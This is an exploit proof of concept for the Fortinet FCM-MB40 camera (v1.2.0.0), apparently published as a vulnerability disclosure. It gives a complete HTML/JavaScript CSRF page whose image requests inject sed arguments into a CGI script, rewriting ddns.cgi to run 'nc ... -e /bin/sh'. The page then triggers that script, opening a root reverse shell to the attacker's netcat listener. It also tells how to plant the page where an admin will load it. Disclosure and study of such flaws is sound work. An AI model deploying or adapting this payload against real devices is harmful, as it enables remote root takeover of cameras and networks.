Share
# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF  
# Date: 2019-06-19  
# Exploit Author: @XORcat  
# Vendor Homepage: https://fortinet.com/  
# Software Link: Customer Account Required  
# Version: v1.2.0.0  
# Tested on: Linux  
# CVE : TBA  
  
<html>  
<!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat)   
  
Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/  
  
Follow the following steps to demonstrate this PoC:  
  
1. Replace IP addresses in Javascript code to repr esent your testing  
environment.  
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp  
1337`  
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.  
* Note: all modern browsers will cache Basic Authentication  
credentials (such as those used by the FCM-MB40) even if the  
FCM-MB40's administration page is closed.  
4. Open the crafted HTML document using the "admin" user's  
browser.   
* Note: In an attack scenario, this step would be performed by  
implanting the code into a legitimate webpage that the "admin"  
user visits, or by tricking the "admin" user into opening a page  
which includes the code.  
5. Note that the `netcat` listener established in step 2. has received  
a connection from the camera, and that it is presenting a `/bin/sh`  
session as root.  
* Note: type `id` in the `netcat` connection to verify this.  
  
_Note: After this issue has been exploited, the state of the system will  
have changed, and future exploitation attempts may require  
modification._  
-->  
<head>  
<script>  
const sleep = (milliseconds) => {  
return new Promise(resolve => setTimeout(resolve, milliseconds))  
};  
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';  
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';  
  
var sed_img = document.createElement("img");  
sed_img.src = sed_url;  
  
sleep(400).then(() => {  
var execute_img = document.createElement("img");  
execute_img.src = execute_url;  
});  
</script>  
</head>  
<body>  
<h1>Welcome to my non-malicious website.</h1>  
</body>  
</html>